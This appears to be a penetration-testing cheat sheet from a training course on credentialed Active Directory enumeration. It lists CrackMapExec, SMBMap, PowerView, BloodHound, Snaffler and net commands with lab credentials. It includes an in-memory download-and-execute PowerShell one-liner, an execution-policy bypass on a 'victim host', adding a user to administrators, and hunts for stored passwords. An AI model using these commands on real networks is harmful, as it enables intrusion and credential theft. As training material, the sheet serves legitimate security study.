Credentialed Enumeration

Credentialed Enumeration - Linux

CrackMapExec

Domain User Enumeration

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --users

Domain Groups Enumeration

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --groups

Domain Logged On Users

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --loggedon-users

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --shares

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'

SMBMap

List Shares

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP>

Recursive List Shares

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP> -R '<share-name>' --dir-only

RPCclient

UserEnum by RID

HTB_@cademy_stdnt! <RID>

WindapSearch

Search Domain Admins

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da

Search Privileged Users

python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU

BloodHound-py

Enumerating Everything

sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all

Credentialed Enumeration - Windows

Active Directory PowerShell Module

# Import Module
Import-Module ActiveDirectory

Domain Info

Get-ADDomain

Users Info

Get-ADUser

Trust Relations

Get-ADTrust -Filter *

Group Info

Get-ADGroup -Filter * | select name

Detailed Group Info

GetADGroup -Identity <group-name>

Group Memebership

Get-ADGroupMember -Identity <group-name>

PowerView

Domain Information

Get-Domain

Show Domain Controller

Get-DomainController

Show all Users

Get-DomainUser

Show All Computers

Get-DomainComputer

Show all Groups

Get-DomainGroup

Showe specific OU objects in AD

Get-DomainOU

Show Specific ACL's

Find-InterestingDomainAcl

Show members of a specific domain group

Get-DomainGroupMember

Show all GPO

Get-DomainGPO

Show User GPO Rights

# Change this to the user
$sid=Convert-NameToSid "Domain Users"

# Check Rights
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}

Show Domain Policy

Get-DomainPolicy

Show Local Groups

Get-NetLocalGroup

Show members of a specific local group

Get-NetLocalGroupMember

Show Domain Shares

Find-InterestingDomainShareFile

Show machines on the local domain

Find-LocalAdminAccess

Show Domain Trust

Get-DomainTrust

Show all forest trusts for the current forest or a specified forest

Get-ForestTrust

Show Trusts in all

Get-DomainTrustMapping

Find Password In Users Description

Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}

Find Passwd_NOTREQ

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

DONT_REQ_PREAUTH

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Snaffler

https://github.com/SnaffCon/Snaffler

Help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.

Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data

Credentialed Enumeration With Built-In Tools

Basic Enumeration Commands

# Prints the PC's Name
hostname 

# Prints out the OS version and revision level
[System.Environment]::OSVersion.Version

# Prints the patches and hotfixes applied to the host
wmic qfe get Caption,Description,HotFixID,InstalledOn

PowerShell Enumeration Commands

# Lists available modules loaded for use.
Get-Module 

# Will print the execution policy settings for each scope on a host.
Get-ExecutionPolicy -List 

# This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
Set-ExecutionPolicy Bypass -Scope Process 	

# Return environment values such as key paths, users, computer information, etc.
Get-ChildItem Env: | ft Key,Value

# This is a quick and easy way to download a file from the web using PowerShell and call it from memory.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

# Status Firewall
netsh advfirewall show allprofiles

# Status Windows Defender
Get-MpComputerStatus

Net Commands

# Information about password requirements
net accounts

# Password and lockout policy
net accounts /domain

# Information about domain groups
net group /domain

# List users with domain admin privileges
net group "Domain Admins" /domain

# List of PCs connected to the domain
net group "domain computers" /domain

# List PC accounts of domains controllers
net group "Domain Controllers" /domain

# User that belongs to the group
net group <domain_group_name> /domain 

# List of domain groups
net groups /domain 	

# Lst users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup administrators /domain

# Add user to administrators
net localgroup administrators [username] /add 	

# Check current shares
net share

# Get information about a user within the domain
net user <ACCOUNT_NAME> /domain

# List all users of the domain
net user /domain 	

# Get a list of computers
net view

PreviousAccess Control Lists and Entries (ACL & ACE)NextPassword Attacks

Last updated 12 months ago